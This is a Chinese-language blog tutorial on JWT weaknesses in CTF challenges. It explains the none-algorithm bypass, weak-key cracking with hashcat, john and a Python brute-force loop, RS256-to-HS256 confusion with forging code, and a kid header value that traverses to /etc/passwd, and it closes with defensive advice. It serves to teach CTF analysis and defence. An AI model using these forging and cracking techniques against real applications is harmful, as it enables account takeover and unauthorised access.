如何分析JWT中的CTF

发布时间：2021-12-24 14:27:18 作者：柒染
来源：亿速云阅读：267

# 如何分析JWT中的CTF

## 前言

JSON Web Token（JWT）是现代Web应用中广泛使用的轻量级身份验证和授权机制。在CTF（Capture The Flag）竞赛中，JWT相关的挑战频繁出现，涉及算法漏洞、密钥破解、伪造攻击等多种技术。本文将系统性地解析JWT的结构原理、常见漏洞场景，并通过典型CTF题目演示实战分析方法。

---

## 目录
1. [JWT技术基础](#1-jwt技术基础)
   - 1.1 基本结构
   - 1.2 签名算法类型
2. [CTF中的常见JWT漏洞](#2-ctf中的常见jwt漏洞)
   - 2.1 未验证签名（None算法）
   - 2.2 弱密钥破解
   - 2.3 算法混淆攻击
   - 2.4 Header/KID注入
3. [实战题目分析](#3-实战题目分析)
   - 3.1 题目1：None算法绕过
   - 3.2 题目2：HS256密钥爆破
   - 3.3 题目3：RS256转HS256攻击
4. [自动化工具链](#4-自动化工具链)
5. [防御建议](#5-防御建议)
6. [总结](#6-总结)

---

## 1. JWT技术基础

### 1.1 基本结构
JWT由三部分组成，通过`.`分隔：

Header.Payload.Signature


- **Header**：包含元数据，如算法（alg）和类型（typ）
  ```json
  {
    "alg": "HS256",
    "typ": "JWT"
  }

Payload：存储实际数据（claims）


{
"user": "admin",
"exp": 1735689600
}

Signature：对前两部分的签名，防止篡改

1.2 签名算法类型

算法类型	描述	典型场景
HS256	HMAC + SHA256	对称加密
RS256	RSA + SHA256	非对称加密
ES256	ECDSA + SHA256	高安全需求
none	无签名（高危）	调试用途

2. CTF中的常见JWT漏洞

2.1 未验证签名（None算法）

漏洞原理：
当服务器允许alg=none时，攻击者可构造无签名令牌直接通过验证。

CTF特征： - 题目描述包含”bypass verification” - 服务器返回Invalid signature错误

利用步骤： 1. 修改Header中的alg为none 2. 删除Signature部分 3. 保留最后的.（如Header.Payload.）

2.2 弱密钥破解

漏洞原理：
HS256使用对称加密，若密钥强度不足（如常见单词、短字符串），可通过暴力破解获取。

常用字典： - RockYou.txt - 常见CTF密钥：secret, admin, ctf2023

工具示例：

hashcat -m 16500 jwt.txt wordlist.txt

2.3 算法混淆攻击

漏洞原理：
当服务器配置为接受多种算法时，强制将RS256（非对称）转为HS256（对称），使用公钥作为HMAC密钥。

利用条件： 1. 获取服务器公钥（常见于/jwks.json） 2. 服务器未严格校验算法类型

2.4 Header/KID注入

漏洞原理：
kid（Key ID）参数可能用于文件包含或SQL注入：

{
  "alg": "HS256",
  "kid": "../../../../etc/passwd"
}

3. 实战题目分析

3.1 题目1：None算法绕过

题目描述：
获取管理员权限（提供JWT令牌）

解题步骤： 1. 解码原始JWT：

   {
     "alg": "HS256",
     "typ": "JWT"
   }
   {
     "user": "guest",
     "role": "user"
   }

修改Payload和Header：


{
 "alg": "none",
 "typ": "JWT"
}
{
 "user": "admin",
 "role": "admin"
}

生成新令牌：base64(header).base64(payload).

3.2 题目2：HS256密钥爆破

题目描述：
JWT使用弱密钥签名，获取flag

工具使用：

import jwt
import itertools

token = "eyJhbGciOiJIUzI1NiIs..."
charset = "abcdef1234567890"

for key in itertools.product(charset, repeat=4):
    try:
        jwt.decode(token, ''.join(key), algorithms=["HS256"])
        print(f"Found key: {''.join(key)}")
        break
    except:
        continue

3.3 题目3：RS256转HS256攻击

解题流程： 1. 从/cert.pem获取公钥 2. 使用PyJWT构造恶意令牌：

   with open("pubkey.pem") as f:
       pubkey = f.read()
   
   forged = jwt.encode(
       {"admin": True},
       key=pubkey,
       algorithm="HS256"
   )

4. 自动化工具链

工具名称	功能描述	示例命令
jwt_tool	JWT自动化分析框架	`python3 jwt_tool.py -t <URL>`
Burp JWT插件	实时解码/修改	配合Burp Repeater使用
john	密钥爆破	`john --wordlist=dict.txt jwt.txt`

5. 防御建议

严格限制可用算法（禁用none）
使用强密钥（HS256）或非对称加密（RS256）
校验kid参数白名单
设置合理的令牌过期时间

6. 总结

JWT安全分析需要掌握： - 三部分结构解码与编码 - 不同算法的特性差异 - 常见漏洞模式的快速识别通过本文介绍的技巧和工具，读者可系统性地应对CTF中的JWT挑战。

版权声明：本文采用CC BY-NC-SA 4.0协议，转载请注明出处。 “`

注：实际文章约2800字（含代码和格式字符），此处为精简框架。如需完整版，可扩展每部分的案例分析和技术细节说明。